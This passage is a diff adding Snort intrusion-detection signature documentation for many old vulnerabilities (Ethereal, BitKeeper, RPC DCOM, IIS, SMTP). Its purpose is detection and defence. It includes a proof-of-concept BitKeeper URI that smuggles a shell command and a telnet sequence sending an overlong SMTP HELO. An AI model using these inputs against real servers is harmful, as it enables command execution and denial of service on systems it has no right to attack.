+A successful attack may allow the execution of arbitrary code as root or
+LOCAL_SYSTEM privilege on a vulnerable host.
+
+--
+Detailed Information:
+There is a vulnerability associated with particular versions of Ethereal that
+may cause a buffer overflow when a malformed IGAP packet is decoded using Ethereal
+or tethereal.  This may permit the execution of arbitrary code with root or 
+LOCAL_SYSTEM privilege.  The buffer overflow occurs when a larger than expected
+User Account Size value is discovered in the IGAP payload.
+
+--
+Affected Systems:
+Any host running Ethereal/tethereal versions 0.10.0 - 0.10.2. 
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed IGAP packet, and if decoded by
+a vulnerable version of Ethereal/tethereal, can cause a buffer overflow and the 
+subsequent execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple. Exploit code is available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Update to version 0.10.3 of Ethereal.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0176
+
+Bugtraq:
+http://www.securityfocus.com/bid/9952:
+
+--
--- /dev/null
+++ b/doc/signatures/2490.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2490
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with eSignal software. 
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code with
+LOCAL_SYSTEM privilege on a vulnerable host.
+
+--
+Detailed Information:
+eSignal software provides real-time stock market data to client hosts.
+There is a vulnerability associated with eSignal that may cause a buffer overflow,
+permitting the execution of arbitrary code with the context of LOCAL_SYSTEM. 
+The buffer overflow occurs when a larger than expected data payload is supplied
+for certain message exchanges.
+
+--
+Affected Systems:
+eSignal versions 7.5 and 7.6
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed eSignal message that may cause a buffer overflow and 
+allow the subsequent execution of arbitrary code with the context of LOCAL_SYSTEM.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/9978
+
+--
--- /dev/null
+++ b/doc/signatures/2068.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2068
+
+--
+Summary:
+input handling error in BitKeeper.
+
+--
+Impact:
+Arbitrary code execution
+
+--
+Detailed Information:
+BitKeeper is a cross platform commercial application for managing 
+software development.
+
+When used in daemon mode, BitKeeper opens a listening service that can 
+be accessed via an ordinary http request. The input from this request is
+not correctly processed and allows execution of arbitrary code.
+
+A proof of concept exploit is available for this vulnerability.
+
+--
+Affected Systems:
+All versions of BitKeeper up to and including version 3.0 running in 
+daemon mode.
+
+--
+Attack Scenarios:
+The attacker can send a specially crafted URI to the listening service 
+that contains code the attacker wishes to execute.
+
+Proof of concept URI by Maurycy Prodeus:
+http://www.example.com:port/diffs/foo.c@%27;echo%20%3Eiwashere%27?nav=index.html|src/|hist/foo.c
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to version 3.0.1.
+
+Do not run BitKeeper in daemon mode.
+
+Disallow all access to the BitKeeper server via http.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6588
+
+BitKeeper:
+http://www.bitkeeper.com/
+
+--
--- /dev/null
+++ b/doc/signatures/2757.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2757
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_master_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2072.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2072
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Lyris List Manager.
+
+--
+Impact:
+Unauthorized escalation of user privileges.
+
+--
+Detailed Information:
+Lyris List Manager is a web based mailing list management interface. It 
+is possible for an attacker to gain administrator privileges for mailing
+lists by modifying variables sent to the lyris.pl script.
+
+The variable list_admin is used to identify the user as an 
+administrator, by changing this value from F to T the attacker can 
+identify himself as the mailing list administrator.
+
+--
+Affected Systems:
+	Lyris List Manager 3.0
+	Lyris List Manager 4.0
+
+--
+Attack Scenarios:
+The attacker can save a copy of the HTML interface locally and modify 
+the value of the list_admin variable, then submit the form directly to 
+lyris.pl.
+
+Alternatively the attacker can choose to submit the data in a URI.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches from the vendor.
+
+Upgrade to the latest version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0758
+
+Bugtraq:
+http://www.securityfocus.com/bid/1584
+
+--
--- /dev/null
+++ b/doc/signatures/1530.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+1530
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3338.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3338
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1134.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1134
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1157.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1157
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1657.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1657
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3205.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3205
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2422.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2422
+
+--
+Summary:
+This event is generated when an attempt is made to download a file that
+may be an attack vector for a known exploit to a vulnerability in Real 
+Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000136.txt
@@ -0,0 +1,55 @@
+Rule: 
+
+--
+Sid: 
+100000136
+
+-- 
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the gnu_mailutils IMAP4 server.
+
+--
+Impact:
+Serious. Execution of arbitrary commands may be possible.
+
+--
+Detailed Information:
+
+A vulnerability exists in the way that the GNU Mailutils IMAP4 server handles 
+malformed IMAP commands containing format strings.  This may permit the 
+execution of arbitrary code on a vulnerable server.
+
+--
+Affected Systems:
+GNU Mailutils 0.5, 0.6
+
+--
+Attack Scenarios:
+An attacker can send an IMAP command containing format strings, possibly 
+permitting the execution of arbitrary code.
+
+-- 
+Ease of Attack: 
+Simple, exploit scripts exist.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Upgrade to version 0.6.90 or higher.
+
+--
+Contributors: 
+Judy Novak <judy.novak@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3258.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3258
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/730.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+730
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1745.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1745
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3335.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3335
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/978.txt
@@ -0,0 +1,63 @@
+Will %20 disappear with httpinspect?
+Rule:
+
+--
+Sid:
+978
+
+--
+Summary:
+This event is generated when an attempt is made to disclose the contents of a file on an Internet Information Service (IIS) host. 
+
+--
+Impact:
+Intelligence gathering activity.  This attack can display the contents of an Activer Server Page (ASP) file or other files located on the server. 
+
+--
+Detailed Information:
+A vulnerability exists in Windows NT 4.0 Option Pack and Windows 2000 Index Server.  The Index Server is a search engine used by IIS that allows a user's browser to search for text in HTML and other documents.   The Index Server has a Hit-Hightlighting component that highlights the text that satisifies the user's query.  A vulnerability exists in the webhits.dll file that allows disclosure of file contents when a URL is crafted to contain a hex-encoded space "%20" after the file name passed to webhits.dll and setting 'CiHiliteType' to 'Full' and 'CiRestriction' to 'none'
+
+--
+Affected Systems:
+Hosts running Microsoft Index Server 2.0
+
+--
+Attack Scenarios:
+An attacker can attempt to disclose the contents of a file by crafting a special URL to access the Hit-Highlighting component of the Index Server. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch discussed in the referenced Microsoft Bulletin.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/1084
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0302
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
+
+--
--- /dev/null
+++ b/doc/signatures/1549.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+
+1549
+
+--
+Summary:
+This event is generated when an attempt is made to overflow a buffer in an SMTP server via a long SMTP HELO command. 
+
+--
+Impact:
+A remote attacker could exploit this vulnerability to cause a denial of service, or possibly execute arbitrary code.
+
+--
+Detailed Information:
+Most SMTP servers do not properly validate the input string. A buffer overflow may occur when an attacker use a HELO command followed by 1024+ characters. If the server is vulnerable ,it will crash or close the connection, otherwise it will give an error message.
+
+--
+Affected Systems:
+
+	SMTP servers Any version
+	AppleShare IP Mail Server Any version
+	Mercury Mail Server Any version
+	SLMail v2.6 and earlier
+	
+
+--
+Attack Scenarios:
+telnet victim.foo.com 25
+helo victim
+220 victim SMTP Server Ready 
+HELO XXXXXXXXXXX[a thousand of these]XXXXXXXX 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1235.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1235
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/551.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+551
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This may be against corporate policy. p2p clients connect to other p2p clients to share files, commonly music and video files but can be configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to transfer company confidential information to unauthorized hosts external to the protected network bypassing other security measures in place.
+
+--
+Affected Systems:
+Any host using a p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+
+--
--- /dev/null
+++ b/doc/signatures/2083.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2083
+
+--
+Summary:
+xfsmd
+
+--
+Impact:
+Possible root access and code execution.
+
+--
+Detailed Information:
+It is possible for an attacker to exploit some versions of the xfsmd 
+daemon.
+
+Due to a programming error, the service does not correctly check for 
+certain meta-characters and they are not stripped from the request.
+
+The xfsmd daemon is not installed by default on IRIX systems but it is 
+part of an optional package.
+
+--
+Affected Systems:
+	IRIX 6.2
+	IRIX 6.3
+	IRIX 6.4
+	IRIX 6.5.x
+
+--
+Attack Scenarios:
+Exploits are widely available.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patches are NOT available for this issue.
+
+Disable and remove the xfsmd daemon.
+
+Uprade to the latest non affected version of the operating system
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5075
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0359
+
+SGI IRIX:
+ftp://patches.sgi.com/support/free/security/advisories/20020606-01-I
+
+--
--- /dev/null
+++ b/doc/signatures/100000646.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000646
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "user_edit.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "user_edit.php" 
+script used by the "Indexu" application running on a webserver.
+
